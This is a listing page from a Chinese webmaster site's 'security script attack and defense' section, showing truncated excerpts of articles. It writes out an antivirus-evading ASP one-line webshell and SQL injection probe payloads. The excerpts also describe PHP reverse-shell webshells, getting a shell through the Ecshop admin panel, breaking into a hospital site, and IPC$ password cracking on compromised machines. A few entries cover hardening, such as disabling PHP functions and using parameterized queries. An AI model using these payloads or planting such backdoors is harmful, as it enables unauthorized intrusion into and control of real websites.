17站长网

17站长网 首页 安全脚本攻防
  • 史上最全的各个脚本的一句话木马
  • 以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错, 上面这句是防杀防扫的!网上很少人用!可以插在
  • 时间: 2022-9-27 08:34
  • Linux实用一句话脚本介绍
  • 1、查看谁破解你的ssh cat /var/log/auth.log | grep "pam_unix(sshd:auth): authentication failure;" | cut -f14 -d\ | cut -d'=' -f2 | sort | uniq -c | sort -nr 2、查看当前网络连接数 netstat -n | awk '/^tc
  • 时间: 2022-9-27 08:34
  • 设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等
  • 设置.net1.1安全: 修改C:\WINDOWS\Microsoft.net\Framework\v1.1.4322\CONFIG\machine.config 文件. 改为 参考资料:http://msdn.microsoft.com/zh-cn/library/72wdk8cc(VS.80).aspx 设置.net2.0安全. 打开IIS->
  • 时间: 2022-9-27 08:29
  • MSSQL 2005 入侵提权过程分享
  • MSSQL 2005 入侵提权过程分享
  • 前言:本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。 前期 在拿到一个webshell 后对提权进行分析如下。 1、serv-u 6.4.0.2、mssql sa密码权限3、sogou拼音输
  • 时间: 2022-9-27 08:29
  • PHP Webshell 下的端口反弹方法
  • PHP Webshell 下的端口反弹方法
  • 使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。  测试实例:先在本地执行
  • 时间: 2022-9-27 08:28
  • 手工注入方法,方便大家测试程序漏洞
  • 1、加入单引号 ’提交, 结果:如果出现错误提示,则该网站可能就存在注入漏洞。 2、数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型) 结果:分别返回不同的页面,说明存在注入漏洞. 分析
  • 时间: 2022-9-27 08:28
  • 网站被SQL注入后应该如何防范
  • 网站被“成功”注入,网站一些页面被插入了下载病毒的代码,经查: 生产服务器的代码没有任何被改动过的迹象,排除服务器被入侵,代码被篡改的可能; 有病毒下载代码的部分,在数据库里真实看到了篡改迹象,可以排除
  • 时间: 2022-9-27 08:27
  • php disable_functions的函数列表
  • 禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: 代码如下: disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_
  • 时间: 2022-9-27 08:23
  • php后台插入一句话后门的思路分享
  • 首先介绍下php的各种标签: 1): demo: 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): 这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它, 大多程序员都
  • 时间: 2022-9-27 08:22
  • IPC$扫描和IPC$漏洞的防范小结
  • IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码登陆你的系统的一个通道!而 IPC$ 并不算是一个漏洞,但因一般电脑用户设置系统的密
  • 时间: 2022-9-26 14:46
  • 常用的一些注入命令总结!
  • 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varch
  • 时间: 2022-9-26 14:46
  • 浅说双引号被过滤时一句话的插入与防范
  • 浅说双引号被过滤时一句话的插入与防范
  • 一般而言,后台插一句话,如果数据库扩展名是asp的话,那么插数据库,但是如果有配置文件可以插的话,那肯定是插入配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后
  • 时间: 2022-9-26 14:44
  • upfile asp文件上传,又一奇迹般的突破
  • 然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。 如何突破呢?其实是可以的. 关键是 [不修改名字] 先来看看一个上传的数据包: POST /fa-bu/upload/upfile1.asp HTTP/1.1 Accept: application/x-s
  • 时间: 2022-9-26 14:44
  • php注入基本步骤小结
  • php注入十点基本步骤 1、判断是否存在注入,加'、and 1=1、and 1=2 2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询 3、利用order by 暴字段,在网址后加 order by 10/*
  • 时间: 2022-9-26 14:43
  • Ecshop后台拿shell方法总结
  • Ecshop后台拿shell方法总结
  • 方法一:龙儿心发明的,版本未定,估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Typ
  • 时间: 2022-9-26 14:43
  • 后台登入框注入拿shell步骤
  • 后台登入框注入拿shell步骤
  • 打开网站(网址就不发了,只讲过程),是一个医院的站点,看了下网站程序,是asp的,嘻嘻,asp的站日的比较多,对它有点亲切感,随便点了一个新闻链接,加上一个单引号,弹出了一个对话框 看来有点防范啊,为了确定是
  • 时间: 2022-9-26 14:41
  • 使用参数化查询防止SQL注入漏洞
  • SQL注入的原理 以往在Web应用程序访问数据库时一般是采取拼接字符串的形式,比如登录的时候就是根据用户名和密码去查询: [code]string sql = "SELECT TOP 1 * FROM [User] WHERE UserName = '" + userName + "' A
  • 时间: 2022-9-26 14:41
  • IPC$ Password Crack BAT
  • 有时候在肉鸡下面想整个其他的肉鸡,用SOCK5反向代理,麻烦又慢,有N多线程的IPC$密码破解工具,无奈别人装着杀软哇,做个免杀忒麻烦,大可不必动用牛刀,一点点软给我们提供了N多命令行工具,直接上个批处理脚本,
  • 时间: 2022-9-26 14:41
  • PHP类型网站的万能密码
  • 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。 其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。 其实GPC魔术转换是否开启对用万能密码进后台一点影响
  • 时间: 2022-9-26 14:40
  • PHP是世界上最好的语言]:不信你看这款PHP写的敲诈者木马
  • PHP是世界上最好的语言]:不信你看这款PHP写的敲诈者木马
  • 有个笑话:女的说,你们能让论坛上的人吵起来,我就做你女朋友。男的发了一句话:PHP是世界上最好的语言。瞬间论坛就炸锅了,女的说好吧,我同意了,咱们去吃饭吧。男的:不!我一定要说服他们PHP必须是世界上最好的
  • 时间: 2022-9-26 14:40
12

热门排行

    最近更新

      返回顶部